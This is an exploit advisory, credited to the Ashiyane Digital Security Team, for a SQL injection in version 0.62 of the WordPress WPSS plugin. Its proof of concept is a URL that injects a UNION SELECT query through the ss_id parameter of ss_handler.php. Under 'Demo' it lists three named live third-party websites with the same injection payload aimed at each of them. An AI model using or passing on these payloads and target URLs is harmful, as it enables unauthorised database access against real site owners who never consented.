WordPress WPSS plugin version 0.62 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
1f4c75c4efbfbde58f520ccfb0a4fa721c4efa0f5d82dd24d0058aa8d15ba2d3
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-08-05
|
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
|
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
|
| [*] Version : 0.62
|
| [*] Tested on: Windows , Mozila Firefox
|-------------------------------------------------------------------------|
| [*] PoC :
|
| [*]
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|